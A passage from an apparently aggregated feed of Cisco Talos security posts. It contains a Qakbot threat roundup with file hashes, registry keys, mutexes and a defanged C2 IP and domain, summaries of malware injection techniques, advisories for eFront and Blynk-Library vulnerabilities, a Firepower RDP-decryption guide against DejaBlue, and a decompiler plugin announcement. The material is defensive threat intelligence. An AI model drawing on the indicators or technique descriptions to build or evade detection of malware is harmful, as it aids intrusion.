                  15f730329a5f5931052f028770629fd0fc90661c0bdd5a98c24c5c5b79f81774 21a0f59cd2dd48186a2a5f45b96a7b9f2152bd22e361f50547ba76d8cb82b6eb 29e261b1bc20231df371c5718d9619c2445cb31260609e6a4787395b1382d883 37bbbe62a193a2b85dea704e2375850bd620e7b2e68235df0a5aa78aa2ba6688 38a0e91b74713a524f49d1ddce5dd1c3a22c34fb053bedde39659792c4acd0fc 38ae428938b7dc6a09f33bf3f3a55c7eec15a0cae695d9ac3e435a1ad887cdbc 3c3fa850ef2811432a6a37733e6fdb590ec6527291d0abcf0f74287df5214c76 3d03bd0db3532078bdba4b794da355c189222850535820a3f2570b4f1343e155 3e4393b3980a0dff3e6b364ea1ae1dabab7e079f90bf002efa280901ee7e0894 40b836c7f127ac0b67343746ad46e2058dd56f6b198629667e2c4dff19b06770 43d25cdcd985d5dceedfcd655ce06b9fb58df5e6a680764be91149249140d836 467e29745a7ec5f30c3df7f2cd74b78df6f075ee9b0c709ddec34382f6f9f116 46a112798b137e1977df820e5ba4d9f8908ff802e64f9d978f43354cd175712f 48945ce8f30583fb2796d0b8496a6a374bd2b57fab8965f758ba314a2c29ea5c 4a6125eb20553669ffb92f8b04baa3ed685ea8e34181814e82a1d26b128e0376 4d34b2fbc133331656ebf6583657a2a545387eef68829909649a8a161943531d 4dd1b6513ac756dcddd584a1734f2bf44af0741c5604c570bed28a9eced9acf6 4f4545bb03e227873fff3be2e471e012ff85440a11f9284a86c38611ac57f0ab 4f6e94a61f766e0b8d95009da98bfc0f525ce02932129d12a2da22cdac0edcb8 4fba37bd388eb78145f81f8c8679d4c147792ada6017b6665517974e291013a4 503309f6f90a6cac1f90153c89d08efa7856105eabaa64d56a3158880e057d88 52a69ad3586a2efe01f23d585c351c13da945453194bacb4bdaab6949b9d5fb0 5412da86b9e5483547f10d2e36da09f17d6c9e0956b8167987a72b4c7827b105 542f2945f5b6de001dac02ba0db3a7ca0987ea3f13a2a83b1b2cd9ddc40b0e7d 557818fb74b32f1e642f4ad228e657a73a11844afb5250a827a953a0e690dcc7
                  *See JSON for more IOCs

                  Coverage

                  ProductProtection
                  AmpThis has coverage
                  Cloudlock N/A
                  CwsThis has coverage
                  Email SecurityThis has coverage
                  Network SecurityThis has coverage
                  Stealthwatch N/A
                  Stealthwatch Cloud N/A
                  Threat GridThis has coverage
                  UmbrellaThis has coverage
                  WsaThis has coverage

                  Screenshots of Detection

                  AMP


                  ThreatGrid


                  Umbrella




                  Win.Dropper.Qakbot-7133972-0

                  Indicators of Compromise

                  Registry KeysOccurrences
                  <HKLM>\SOFTWARE\MICROSOFT\MICROSOFT ANTIMALWARE\SPYNET
                  Value Name: SpyNetReporting
                  25
                  <HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\AUTHROOT\CERTIFICATES\DAC9024F54D8F6DF94935FB1732638CA6AD77C13
                  Value Name: Blob
                  25
                  <HKLM>\SOFTWARE\MICROSOFT\MICROSOFT ANTIMALWARE 25
                  <HKLM>\SOFTWARE\MICROSOFT\MICROSOFT ANTIMALWARE\SPYNET 25
                  MutexesOccurrences
                  Global\eqfik25
                  Global\ufwao25
                  llzeou25
                  5362a8e863415e3c7ed2392c736a25
                  5362a8e863415e3c7ed2392c736/C25
                  IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
                  198[.]49[.]66[.]13025
                  Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
                  www[.]allens-treasure-house[.]com25

                  File Hashes

                  09d52dcd746678ab7cfdf98920c69af368d0024dd387fea4cb4cf23af7c8100c 0fc1f1bbe848a9b6fdeb45135b262dcc2bface23a484f1f004c68dfc1048ef12 13579cd0a09fc3f35b0e086a3e4da7044005f820eb91a5a8172b37a997d9baf8 17d1ab8faf6c77c2155c414ff152afcb54dfdb274898fe6875db1b0b5b439977 1bd9b51dd8926e70c8749e415c9c87192c23240e6bd78fa1ff141e320ef2ad13 1fe482aac4ef067817e8b65ad3411cb94af8cad2a3758e284ccd42d25370723c 20e192f48253abdeba665e38681d5fc6977cf114007b45967ca7a0cdd0cccd96 21a01de82da765f27f34dc14dfda9660cfc3fed24423d98705d2d1550ea36ba1 2976602ffae5758d0eb0e7ccd0fa8eb7595a4ced9ead3a8b830410a2058b99e1 2ec0ff7389d034e2bd400e451edca5a3deda018a87dfccc9118f6f116759034b 3c4680da012f0b51a506dc7a0fbe3ae296d7ad96366dc8219167e6ac3887fc77 42be15098d49494e1cc88f97d6d4ed5547839b38db878e798764481d484853df 4dc140ee0226f7b07fe8fd810ba2486415bc3b13018b55238ca8865a76943618 5362a8e863415e3c7ed2392c736fd118775b470e37ea19257fc4c41941b6f342 546bbc6277e9a0057e38f166b2c9b066e27581e160b5c98043566225e2c2d836 63b6c543e28bae70de1b6fe67906831327d06dd65ccb8d8ca52e92636b3931bd 68d76d7697facbe74d18a20181f1e3eb5c17d43ed0bc69fdaab91401b027d8f2 69c47be5330ec6b8946feb79d31d5590d70cca9cc1e49fc120695db169992f63 737eed504a364c8f666c35348e42031f8177e7c8c11bb34f2c2110ba2a55c419 766b64050ada4916906acfb8c97caf163c68f9d38af60243b9a4384609ec0712 786b478fdc0cb9e9b3d09c788f3e13fe04c13db3c21bf750b23d3d421c06ad87 8a01813be148547015b7980bc0974c6da07e57044ed5029655ec624af4f23e59 8ea9c35eec1fb14c8866526e32d4dff022c8ef435afab922989468cd674007e8 92572a77f909ea7edb20fb235012065923928c3ce3a29d9cbdf672a55537121a 9ada91d7ff3140a80f4b344fc6067a105577443792941ab6675f7d4d862c265a
                  *See JSON for more IOCs

                  Coverage

                  ProductProtection
                  AmpThis has coverage
                  Cloudlock N/A
                  CwsThis has coverage
                  Email SecurityThis has coverage
                  Network Security N/A
                  Stealthwatch N/A
                  Stealthwatch Cloud N/A
                  Threat GridThis has coverage
                  Umbrella N/A
                  Wsa N/A

                  Screenshots of Detection

                  AMP


                  ThreatGrid




                  Exploit Prevention

                  Cisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities.
                  Madshi injection detected - (3693)
                  Madshi is a code injection framework that uses process injection to start a new thread if other methods to start a thread within a process fail. This framework is used by a number of security solutions. It is also possible for malware to use this technique.
                  CVE-2019-0708 detected - (3432)
                  An attempt to exploit CVE-2019-0708 has been detected. The vulnerability, dubbed BlueKeep, is a heap memory corruption which can be triggered by sending a specially crafted Remote Desktop Protocol (RDP request). Since this vulnerability can be triggered without authentication and allows remote code execution, it can be used by worms to spread automatically without human interaction.
                  Process hollowing detected - (1556)
                  Process hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then manually sets up the first stages of launching a child process, but before launching it, the memory is cleared and filled in with the memory from the parent instead.
                  Kovter injection detected - (1367)
                  A process was injected into, most likely by an existing Kovter infection. Kovter is a click fraud Trojan that can also act as an information stealer. Kovter is also file-less malware meaning the malicious DLL is stored inside Windows registry and injected directly into memory using PowerShell. It can detect and report the usage of monitoring software such as wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns.
                  Dealply adware detected - (210)
                  DealPly is adware, which claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on webpages. Adware has also been known to download and install malware.
                  Gamarue malware detected - (203)
                  Gamarue is a family of malware that can download files and steal information from an infected system. Worm variants of the Gamarue family may spread by infecting USB drives or portable hard disks that have been plugged into a compromised system.
                  Trickbot malware detected - (133)
                  Trickbot is a banking Trojan which appeared in late 2016. Due to the similarities between Trickbot and Dyre, it is suspected some of the individuals responsible for Dyre are now responsible for Trickbot. Trickbot has been rapidly evolving over the months since it has appeared. However, Trickbot is still missing some of the capabilities Dyre possessed. Its current modules include DLL injection, system information gathering, and email searching.
                  Installcore adware detected - (105)
                  Install core is an installer which bundles legitimate applications with offers for additional third-party applications that may be unwanted. The unwanted applications are often adware that display advertising in the form of popups or by injecting into browsers and adding or altering advertisements on webpages. Adware is known to sometimes download and install malware.
                  PowerShell file-less infection detected - (56)
                  A PowerShell command was stored in an environment variable and run. The environment variable is commonly set by a previously run script and is used as a means of evasion. This behavior is a known tactic of the Kovter and Poweliks malware families.
                  Excessively long PowerShell command detected - (37)
                  A PowerShell command with a very long command line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell based threats.

                  Vulnerability Spotlight: Two vulnerabilities in Epignosis eFront

                  $
                  0
                  0

                  Yuri Kramarz of Security Advisory Incident Response EMEAR discovered these vulnerabilities.

                  Cisco Talos discovered two vulnerabilities in Epignosis eFront — one of which could allow an attacker to remotely execute code on the victim system, and another that opens the victim machine to SQL injections. eFront is an LMS platform that allows users to control their virtual training environments and data. The software boasts the ability to allow large companies to train their employees quickly and efficiently.

                  In accordance with our coordinated disclosure policy, Cisco Talos worked with Epignosis to ensure that these issues are resolved and that an update is available for affected customers. Epignosis confirmed that they released eFront version 5.2.13 to address these issues.


                  Vulnerability details

                  Epignosis eFront LMS PHP deserialization code execution vulnerability (TALOS-2019-0858/CVE-2019-5069)

                  A code execution vulnerability exists in Epignosis eFront LMS v5.2.12. A specially crafted web request can cause unsafe deserialization potentially resulting in PHP code being executed. An attacker can send a crafted web parameter to trigger this vulnerability. Talos discovered that the application deserialized untrusted data without properly limiting or validating the incoming data type.

                  Read the complete vulnerability advisory here for additional information.

                  Epignosis eFront LMS unauthenticated SQL injection vulnerability (TALOS-2018-0859/CVE-2019-5070)

                  An exploitable SQL injection vulnerability exists in the unauthenticated portion of eFront LMS, versions v5.2.12 and earlier. Specially crafted web request to login page can cause SQL injections, resulting in data compromise. An attacker can use a browser to trigger these vulnerabilities, and no special tools are required.

                  Read the complete vulnerability advisory here for additional information.

                  Versions tested

                  Talos tested and confirmed that version 5.2.12 of Epignosis eFront is affected by these vulnerabilities.

                  Coverage

                  The following SNORTⓇ rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

                  Snort Rules: 50746, 50755 - 50760

                  The latest on BlueKeep and DejaBlue vulnerabilities — Using Firepower to defend against encrypted DejaBlue

                  $
                  0
                  0
                  This blog was authored by Brandon Stultz, Holger Unterbrink and Edmund Brumaghin.

                  Executive summary


                  Over the past few months, Microsoft has released several security updates for critical Remote Desktop Protocol (RDP)-related security bugs. These bugs are significant for IT infrastructure because they are classified as "wormable," meaning future malware that exploits them could spread from system to system without requiring explicit user interaction. These vulnerabilities could be exploited by an attacker sending a specially crafted request to the target system's Remote Desktop Service via RDP. We have seen how destructive these kinds of attacks can be, most notably WannaCry. We highly recommend organizations immediately apply Microsoft's patches. Cisco Talos released detection coverage for CVE-2019-0708 and also enhanced guidance to help organizations facilitate inspection of RDP sessions here. Microsoft published additional security updates last month to mitigate two additional remote code execution vulnerabilities, CVE-2019-1181 and CVE-2019-1182, affecting several versions of Microsoft Windows. These bugs are referred to as "DejaBlue" due to their similarities to BlueKeep.

                  Once again, Cisco Talos started working immediately to reverse-engineer the RCE vulnerabilities. Protections for both CVE-2019-1181 and CVE-2019-1182 now exist to keep your systems secure. SID 51369 for SNORT® correctly blocks exploitation of CVE-2019-1181 and CVE-2019-1182. In this post, we'll run through the details of how to protect against this "DejaBlue" exploit and walk through the steps to protect your environment.

                  Remote Desktop Services remote code execution vulnerability (CVE-2019-0708)


                  This vulnerability was originally published in May 2019, and is often referred to as "BlueKeep." It is a pre-authentication vulnerability, meaning that an attacker could attempt to exploit it without first having to authenticate to the affected system with valid credentials. Microsoft released a security advisory regarding this vulnerability and has repeatedly urged organizations to apply the corresponding security update to systems to mitigate the threat of attacks targeting it.

                  Significant research has taken place over the past few months with many researchers working to successfully develop an exploit payload. Working remote code execution exploits have now been developed, although none have been publicly released at this point. As such, organizations should ensure their systems are updated as soon as possible to ensure that their systems are no longer affected by this vulnerability. In situations where security updates cannot be applied, organizations should leverage Network Level Authentication (NLA) functionality available within Microsoft Windows and limit exposure by restricting access to RDP servers from the internet.

                  Remote Desktop Services remote code execution vulnerability (CVE-2019-1181, CVE-2019-1182)


                  Microsoft published additional security updates last month to mitigate two additional remote code execution vulnerabilities affecting several versions of Microsoft Windows. Similar to what was described for CVE-2019-0708, these vulnerabilities are also pre-authentication and do not require any explicit user interaction to successfully compromise affected systems. Microsoft released guidance bulletins for CVE-2019-1181 and CVE-2019-1182 and recommends that organizations ensure their systems are updated as quickly as possible. In addition to installing the security updates, the bulletins specify that enabling NLA on affected systems could be used to provide partial mitigation as this will require attackers to authenticate to RDP servers prior to being able to reach the exploitable condition.

                  Using Firepower to defend against encrypted DejaBlue


                  Like BlueKeep, protection for DejaBlue requires RDP decryption. The following is a guide on setting up RDP decryption with Cisco Firepower. Since DejaBlue targets newer versions of Windows, this guide specifically applies to Windows Server 2019. For older versions of Windows, refer to the guide we previously wrote for BlueKeep.

                  Note: This procedure requires an inline Firepower device that supports SSL decryption. For more information visit Cisco Next-Generation Intrusion Prevention System (NGIPS).

                  Steps for RDP Decryption:

                  1. Determine the certificate used by the RDP server.



                  In Windows Server 2019, RDP TLS certificates are configured in the Server Manager.



                  Click on "Remote Desktop Services" and then "Collections." Click on "Tasks" in the upper right hand corner and then select "Edit Deployment Properties."



                  Click "Certificates."




                  Under "Certificates," click on "View Details" under the Certificate Subject Name.

                  Note the certificate Thumbprint. This is the TLS certificate used in the RDP deployment.

                  2. Export the RDP certificate and private key:



                  Open "Run" and then type "certlm.msc."




                  Locate the certificate that matches the thumbprint from Step 1.




                  Right click on the Certificate. Under "All Tasks" click on "Export…"




                  In the Export Wizard, click Next.




                  Click on "Yes, export the private key."



                  Make sure "PKCS" is selected.




                  Click on "Password" and then enter a password to encrypt the private key.



                  Type in a file name for the PFX file and click "Next."



                  Finally, click "Finish."

                  You have successfully exported the RDP certificate and private key.

                  3. Configure Windows ciphersuites for Firepower.



                  Open Group Policy Management.



                  Right click on your organization's group policy and click "Edit."

                  Navigate to: Computer Configuration -> Policies -> Administrative Templates -> Network -> SSL Configuration Settings. Click on SSL Cipher Suite Order.


                  Set the option to "Enabled" and paste in a set of Ciphersuites Firepower supports for static key decryption:

                  TLS_RSA_WITH_AES_128_CBC_SHA256,TLS_RSA_WITH_AES_128_CBC_SHA,TLS_RSA_WITH_AES_256_CBC_SHA256,TLS_RSA_WITH_AES_256_CBC_SHA,TLS_RSA_WITH_RC4_128_SHA,TLS_RSA_WITH_3DES_EDE_CBC_SHA


                  Click OK. The RDP host should now be set up.

                  Now to prepare the RDP certificate and private key for the Firepower appliance.

                  4. Prepare the RDP certificate and private key for Firepower.

                  For this step, you will need the OpenSSL tool and the PFX file exported in Step 2 (rdp.pfx, in this example).

                  Extract the RDP certificate from the PFX file:
                  $ openssl pkcs12 -in rdp.pfx -clcerts -nokeys -out cert.pem
                  Enter Import Password:

                  This command will ask for the import password — this is the password we typed in on Step 2.

                  Extract the RDP private key from the PFX file:
                  $ openssl pkcs12 -in rdp.pfx -nocerts -out key.pem
                  Enter Import Password:
                  Enter PEM pass phrase:
                  Verifying - Enter PEM pass phrase:

                  The above command will ask for the import password again, as well as a PEM passphrase. Remember this private key passphrase, we will need it when we add the RDP certificate to Firepower.

                  5. Import the RDP key into Firepower.

                  At this point, you should have the RDP cert "cert.pem," as well as the encrypted RDP private key "key.pem."



                  Navigate to Objects -> Object Management.





                  Select "Add Internal Cert" on the top right.



                  Name the certificate (e.g. the server name) and either paste in "cert.pem" or browse to the "cert.pem" file in the "Certificate Data" section. Do the same for "key.pem" in the "Key" section. Click the "Encrypted" box and type in the PEM passphrase from Step 4.

                  You have successfully imported the RDP certificate and private key. Now to create a SSL policy for decryption.

                  6. Create an SSL Policy



                  Navigate to Policies -> SSL




                  Select "New Policy."



                  Enter a policy name and description with default action "Do not decrypt."






                  Once the policy editor has loaded, select "Add Rule" (top right).

                  Name the rule and give it the Action "Decrypt - Known Key". Click the "with" field and select the certificate you imported earlier in Step 5.

                  If applicable, select Source and Destination networks or leave them as "any."




                  Click on the "Ports" tab and input the TCP port 3389 (if appropriate for your environment) under "Selected Destination Ports" and click "Add."




                  Under the "Logging" tab, enable logging at the end of the connection if desired.

                  Click "Add" and then "Save" to save the rule.

                  Additional SSL documentation is available here.

                  6. Enable the Intrusion Prevention Rule for DejaBlue.

                  Navigate to Policies -> Access Control -> Intrusion Prevention.

                  Edit the desired Intrusion Policy.

                  Filter for Snort ID 51369: "OS-WINDOWS Microsoft Windows RDP DecompressUnchopper integer overflow attempt."

                  Click the checkbox and select Rule State -> Drop and Generate Events.




                  Click "Policy Information" and commit changes.

                  7. Configure the Access Control Policy

                  Navigate to Policies -> Access Control and edit the relevant Access Control Policy.




                  Under the "Advanced" tab, edit "SSL Policy Settings."




                  Select the SSL Policy we created in Step 5 and click OK.



                  Ensure that your Intrusion Prevention Policy is selected under "Intrusion Policy used before Access Control rule is determined" within the "Network Analysis and Intrusion Policies" section of the "Advanced" tab.




                  Under the "Rules" tab of your Access Control Policy, ensure you have an appropriate Intrusion Policy set for any "Allow" rules.



                  If appropriate, enable the Intrusion Prevention Policy for your Default Action, as well.




                  Save and deploy changes. Verify RDP connectivity and functionality.




                  Firepower blocking the encrypted DejaBlue exploit:



                  Conclusion


                  Just as CISOs awaited the arrival of a dreaded BlueKeep worm, DejaBlue appeared on the scene to reset the clock. If exploited, an attacker could use DejaBlue to infect many machines quickly and spread malware. The WannaCry ransomware attack from 2017 is the most extreme example of how dangerous this could be. Using the steps outlined in this post, Cisco Firepower users can protect themselves from DejaBlue and BlueKeep.

                  Organizations need to take additional steps to ensure that services like RDP and SMB are not exposed unless explicitly required, but this does not eliminate the need for patching. This is yet another example of why patching is one of the core fundamental concepts in information security. Vulnerabilities this severe appear periodically, and organizations need to be prepared to respond in a variety of different ways. Patching takes time and making sure that you have detection and prevention in place can require varying levels of difficulty.

                  Vulnerability Spotlight: Information disclosure vulnerability in Blynk-Library

                  $
                  0
                  0



















                  Lilith Wyatt of Cisco Talos discovered this vulnerability.

                  Cisco Talos recently discovered an information disclosure vulnerability in Blynk-Library. Blynk-Library is a small library for connecting more than 400 different embedded device models into a private or enterprise Blynk-Server instance. According to the Git repository, it is the "most popular internet-of-things platform for connecting any hardware to the cloud."

                  In accordance with our coordinated disclosure policy, Cisco Talos worked with Blynk to ensure that these issues are resolved and that an update is available for affected customers.

                  Vulnerability details

                  Blynk inc. Blynk-Library BlynkProtocol<Transp>::processInput() information disclosurevVulnerability (TALOS-2019-0854/CVE-2019-5065)

                  An exploitable information disclosure vulnerability exists in the packet-parsing functionality of Blynk-Library v0.6.1. A specially crafted packet can cause an unterminated strncpy, resulting in information disclosure. An attacker can send a packet to trigger this vulnerability.

                  Read the complete vulnerability advisory here for additional information.

                  Versions tested

                  Talos tested and confirmed that version 0.6.1 of Blynk-Library is affected by this vulnerability.

                  Coverage

                  The following SNORTⓇ rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

                  Snort Rule: 50770

                  GhIDA: Ghidra decompiler for IDA Pro

                  $
                  0
                  0
                  By Andrea Marcelli

                  Executive Summary

                  Cisco Talos is releasing two new tools for IDA Pro: GhIDA and Ghidraaas.

                  GhIDA is an IDA Pro plugin that integrates the Ghidra decompiler in the IDA workflow, giving users the ability to rename and highlight symbols and improved navigation and comments. GhIDA assists the reverse-engineering process by decompiling x86 and x64 PE and ELF binary functions, using either a local installation of Ghidra, or Ghidraaas ( Ghidra as a Service) — a simple docker container that exposes the Ghidra decompiler through REST APIs.

                  Here is a quick video walking users through this new tool:
                    

                  Features

                  This new IDA plugin provides the following features:
                  • Synchronization of the disassembler view with the decompiler view: In the default configuration, the disassembler view is synchronized with the decompiler view. By clicking on different functions, both in the IDA Graph view or Text View, the decompiler view is updated accordingly. When a function is decompiled, the result is cached, making the transition between functions quicker.
                  • Decompiled code syntax highlight: The decompiled code is syntax-highlighted as C code using the pygments Python library.
                  • Code navigation by double-clicking on symbol name: A double click (or right-click -> Goto) over the name of a function in the decompiler view, automatically opens the selected function in the decompiler and disassembler view. The same behaviour happens if the functions is selected through the disassembler view and the synchronization between the two views is active.
                  • Adding comments in the decompiler view: GhIDA allows users to insert and update comments in the decompiler view using the default IDA shortcut (or right-click -> Add comment). Each comment will be displayed at the end of the selected line, separated by a double slash. Comments are not added in the disassembler view, too, but they are cached and displayed in the decompiler view, even if the same function is decompiled multiple times.
                  • Symbols renaming: When a symbol is selected in the decompiler view, it is possible to rename it by pressing N (or right-click -> Rename) and then insert the new name in the dialog. The symbol name will be updated in the decompiler and disassembler view. Due to the different syntax used by the Ghidra decompiler and IDA, only a subset of the symbols can be renamed. If a symbol is renamed in the disassembler view, the function must be removed from cache and decompiled again to update the symbols name in the decompiler view, .
                  • Symbols highlight: When clicking on a symbol in the decompiler view, all the other occurrences of the same symbol are highlighted too. The plugin also highlights the corresponding symbols in the disassembler view, but as mentioned above, this is limited to subset of the available symbols.
                  • Storage of decompiled code and comments: If the corresponding option is selected in the configuration, GhIDA stores in two JSON files the decompiled code and comments when IDA is closed. They will be automatically restored the next time the IDB is opened.

                  Installation

                  • GhIDA requires IDA Pro 7.x.
                  • Install the following two Python2 libraries:
                  • pip2 install requests
                  • pip2 install pygments
                  • Clone or download the GhIDA repository from GitHub and copy ghida.py and the ghida_plugin folder in the plugins folder of your IDA Pro installation.
                  • The first time GhIDA is launched (Ctrl+Alt+D or Edit -> Plugins -> GhIDA Decompiler) choose between a local Ghidra installation or the Ghidraaas server. If you want to use GhIDA with a local installation of Ghidra:
                  • Install Ghidra
                  • Add the path of the ghidra folder in the installation path
                  Otherwise, launch a local instance of the server using the Ghidraaas docker container.

                  Quick start

                  Select a function in IDA's Graph or Text view. Then, press CTRL+ALT+D or (Edit -> Plugins -> GhIDA Decompiler). Wait a few seconds and a new window will open showing the decompiled code of the function.

                  For the best user experience, we suggest to open the decompiler view side-to-side with the disassembler view and keep active the synchronization between the two views. It is best to rename a symbol in the decompiler view since it will automatically update in the disassembler view.

                  Technical Details

                  GhIDA exports the IDA project using idaxml.py, a Python library shipped with Ghidra, and then invokes Ghidra in headless mode to obtain the decompiled code, either directly using the local installation, or through the Ghidraaas server, without requiring any additional analysis.

                  When GhIDA is called the first time, the idaxml library is used to create two files: an XML file that embeds a program description according to the IDA analysis (including functions, data, symbols, comments, etc.) and a bytes file that contains the binary code of the program under analysis. While the binary file does not change during the time, the XML file is recreated each time the user flushes the GhIDA cache, in order to take into account updates the user did in the program analysis. To obtain the decompiled code, GhIDA uses FunctionDecompile.py, a Ghidra plugin in Python that exports to a JSON file the decompiled code of a selected function.

                  Ghidra decompiler under the hood

                  The Ghidra decompiler is a standalone C++ project. Ghidra communicates with the decompiler over stdin and stout using a binary protocol specified in the DecompileProcess class, while the DecompInterface Java class implements the logic of the communication.

                  The decompilation process requires the following steps:
                  • Decompiler initialization (requires the specification of the processor, etc.).
                  • The Java client ask to decompile a function.
                  • The decompiler asks the PCodePacked for each instruction of the function.
                  • The decompiler asks for symbols and comments.
                  • The decompiler returns an XML with the decompiled info.

                  This article runs down an initial attempt to directly communicate with the Ghidra decompiler. However, sending PCodePacked, symbols and comments to the decompiler, and finally translating the output to C code, requires a complicated process that goes beyond the scope of this project.

                  Ghidra allows users to import a binary as either an XML or bytes file, a procedure that allows to import in Ghidra projects exported from IDA. Ghidra also provides an IDA plugin with a Python library to ease the exporting process. More importantly, Ghidra can execute Python scripts (using the command-line-based version Analyze Headless) directly on IDA exported XML and bytes files.

                  By exporting the IDA IDB and calling the Ghidra decompiler through the Headless Analyzer, add a small overhead to the decompilation process, but it saves a huge amount of work by abstracting the low-level communication with the Ghidra decompiler.



                  Threat Source newsletter (Sept. 5, 2019)

                  $
                  0
                  0

                  Newsletter compiled by Jon Munshaw.

                  Welcome to this week’s Threat Source newsletter — the perfect place to get caught up on all things Talos from the past week.

                  By now, nearly everyone has heard of BlueKeep. It definitely sounds scary, with of this talk of wormable bugs and WannaCry. But so far, no attackers have used it to launch a large-scale attack.

                  Of course, we knew this wouldn’t stay quiet forever. Last month, Microsoft disclosed more RDP vulnerabilities in what’s being called “DejaBlue.” These are another set of wormable bugs, but we have a walkthrough for how Cisco Firepower customers can stay protected.

                  Elsewhere on the vulnerability front, we have advisories out for an information disclosure in Blynk-Library and two bugs in Epignosis eFront.

                  We also have our weekly Threat Roundup, which you can find on the blog every Friday afternoon. There, we go over the most prominent threats we’ve seen (and blocked) over the past week.

                  Upcoming public engagements with Talos

                  Event: “DNS on Fire” at Virus Bulletin 2019
                  Location: Novotel London West hotel, London, U.K.
                  Date: Oct. 2 - 4
                  Speaker: Warren Mercer and Paul Rascagneres
                  Synopsis: In this talk, Paul and Warren will walk through two campaigns Talos discovered targeted DNS. The first actor developed a piece of malware, named “DNSpionage,” targeting several government agencies in the Middle East, as well as an airline. During the research process for DNSpionage, we also discovered an effort to redirect DNSs from the targets and discovered some registered SSL certificates for them. The talk will go through the two actors’ tactics, techniques and procedures and the makeup of their targets.

                  Event: “It’s never DNS...It was DNS: How adversaries are abusing network blind spots” at SecTor
                  Location: Metro Toronto Convention Center, Toronto, Canada
                  Date: Oct. 7 - 10
                  Speaker: Edmund Brumaghin and Earl Carter
                  Synopsis: While DNS is one of the most commonly used network protocols in most corporate networks, many organizations don’t give it the same level of scrutiny as other network protocols present in their environments. DNS has become increasingly attractive to both red teams and malicious attackers alike to easily subvert otherwise solid security architectures. This presentation will provide several technical breakdowns of real-world attacks that have been seen leveraging DNS for a variety of purposes such as DNSMessenger, DNSpionage, and more.

                  Cyber Security Week in Review

                  • A new study from IBM shows that American taxpayers do not support their tax money going toward paying ransomware extortion requests. The survey found that 80 percent of respondents say they are concerned about a ransomware attack on their city, and 60 percent say they would not want their government using taxpayer dollars to pay off attackers with the promise of returning stolen data.
                  • A server containing millions of phone numbers linked to Facebook acccounts was found exposed online, including 133 million U.S. users. The server was not protected by a password, so anyone who found it could access it. 
                  • The Federal Trade Commission and the state of New York levied a $170 million fine against YouTube for its mishandling of children’s data. YouTube will now require users uploading content targeted toward children to tag them as such, and will ask for parental consent before tracking children’s usage. 
                  • A new report suggests there could be a link between companies and cities that have cyber insurance policies and those who are targeted by ransomware attacks. Organizations with insurance are also more likely to pay any requested extortion payments compared to those without policies. 
                  • Chinese tech company Huawei accused the U.S. of launching cyber attacks against it to steal information. They also said the American government has used “unscrupulous means” to disrupt its business. 
                  • A recently discovered group of malicious websites targeting mobile devices are believed to be sponsored by China to target Uyghur Muslims. The websites were able to infect iPhones and Android devices just by having the user open the site. 
                  • An attack took down a popular online forum used by protestors in Hong Kong. Citizens there have spent weeks pushing back on policies that would closer align the region’s government with China. 
                  • Congress introduced a bipartisan bill that would boost the federal government’s cyber defense systems. The proposed law would increase the amount of funding the Department of Homeland Security has to beef up federal government agencies’ internal security. 
                  • Google Pixel owners began receiving Android 10 this week. The new mobile operating system includes new security and privacy features, including the ability to change location tracking services on an app-by-app basis on one screen. 

                  Notable recent security issues

                  Title: New protection fends off password-stealing attacks from popular VPN service
                  Description: Last week, attackers began launching password-stealing attacks against the Fortigate and Pulse VPN services. At the time, Cisco Talos released SNORT® rules to protect Pulse VPN, and there is now additional protection for Fortigate. Attackers are attempting to steal encryption keys, passwords and other important data from servers utilizing these two VPN services. These bugs can be exploited by sending the unpatched servers a specialized Web request that contains a special sequence of characters.
                  Snort SIDs: 51370 – 51372, 51387 (Written by John Levy) 

                  Title: Multiple vulnerabilities disclosed in Cisco NX-OS software 
                  Description: Cisco disclosed three denial-of-service vulnerabilities in its NX-OS software: CVE-2019-1965, CVE-2019-1964 and CVE-2019-1962. These bugs can cause a variety of conditions, including forced reboots, crashes or disruption of certain processes. All three are considered high-severity vulnerabilities.
                  Reference: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190828-nxos-memleak-dos 
                  https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190828-nxos-ipv6-dos 
                  https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190828-nxos-fsip-dos
                  Snort SIDs: 51365 - 51367 (Written by John Levy)

                  Most prevalent malware files this week

                  SHA 256: 3f6e3d8741da950451668c8333a4958330e96245be1d592fcaa485f4ee4eadb3 
                  MD5: 47b97de62ae8b2b927542aa5d7f3c858
                  Typical Filename: qmreportupload.exe
                  Claimed Product: qmreportupload
                  Detection Name: Win.Trojan.Generic::in10.talos

                  SHA 256:9a082883ad89498af3ad8ece88d982736edbd46d65908617cf292cf7b5836dbc 
                  MD5: 7a6f7f930217521e47c7b8d91fb79649
                  Typical Filename: DHL Scan File.img
                  Claimed Product: IMGBURN V2.5.8.0 - THE ULTIMATE IMAGE BURNER!
                  Detection Name: W32.9A082883AD-100.SBX.TG

                  SHA 256: 7acf71afa895df5358b0ede2d71128634bfbbc0e2d9deccff5c5eaa25e6f5510 
                  MD5: 4a50780ddb3db16ebab57b0ca42da0fb
                  Typical Filename: xme64-2141.exe
                  Claimed Product: N/A
                  Detection Name: W32.7ACF71AFA8-95.SBX.TG

                  SHA 256: 1755c179f08a648a618043a5af2314d6a679d6bdf77d4d9fca5117ebd9f3ea7c 
                  MD5: c785a8b0be77a216a5223c41d8dd937f
                  Typical Filename: cslast.gif
                  Claimed Product: N/A
                  Detection Name: W32.1755C179F0-100.SBX.TG

